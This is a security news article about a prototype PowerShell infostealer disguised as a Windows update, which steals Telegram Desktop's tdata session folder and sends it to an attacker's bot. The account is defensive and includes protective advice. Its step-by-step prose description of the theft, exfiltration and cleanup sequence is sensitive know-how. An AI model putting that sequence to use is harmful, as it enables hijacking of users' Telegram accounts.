Hackers Are Using Fake Windows Updates to Hijack Telegram Sessions

A new Telegram session hijacking method is targeting Windows users, allowing cybercriminals to bypass passwords and two-factor authentication entirely. Disguised as a routine Windows telemetry update, a malicious PowerShell script is actively being tested to silently steal authorization keys directly from defenseless computers. By targeting the local files where Telegram stores its active login sessions, attackers can clone the account access without ever needing to intercept a verification code.

The attack centers on the tdata folder, the specific directory where Telegram for Windows stores the authorization keys used to keep users logged into its servers. When the disguised PowerShell script executes, it first gathers basic system information, including the username, hostname, and public IP address. It then forces the Telegram Desktop application to close, unlocking the local files for editing and extraction.

Once the application is closed, the script zips the entire contents of the tdata folder into a temporary directory. This archive is then forwarded directly to the attackers via a Telegram bot, and the script wipes the temporary files from the computer to hide its tracks. If successful, the attackers gain persistent access to the victim's account until the user manually identifies and terminates the rogue session.

Fortunately, security researchers intercepted this infostealer while it was still in its prototype testing phase. The bot receiving the stolen data was operating under a burner handle, afhbhfsdvfh_bot, with the explicit description "Telegram attacker." Because the malware has not yet been deployed at scale, experts have found no evidence of massive data transfers or widespread account compromises.

Because this attack relies on stealing local session data rather than guessing passwords, defending against it requires securing both your device and your app settings. Security experts recommend maintaining a robust endpoint security suite to block malicious PowerShell scripts from executing via email attachments or sketchy downloads.

• Monitor active sessions: Regularly check your account for unauthorized access. Go to Settings, select Devices, and click Terminate all other sessions if you spot unrecognized activity.
• Enable Two-Step Verification: Add a cloud password by navigating to Settings, then Privacy and Security, and selecting Two-Step Verification.
• Upgrade to Passkeys: For top-tier protection against phishing, set up passwordless authentication by going to Settings, then Privacy and Security, and selecting Passkeys.

This PowerShell prototype highlights a critical shift in the cybercriminal playbook: attackers are increasingly abandoning traditional credential phishing in favor of session token theft. When a hacker steals the tdata folder, they are essentially stealing the "VIP pass" that tells Telegram's servers the user has already successfully logged in. This renders even the most complex passwords and SMS-based two-factor authentication completely useless.

The discovery of this script serves as a stark reminder that application security cannot exist in a vacuum. You can lock down your Telegram account with passkeys and cloud passwords, but if the underlying Windows operating system is compromised by an infostealer, those app-level defenses are bypassed entirely. As threat actors continue to refine these automated extraction tools, users must treat their local application data with the same level of caution as their master passwords.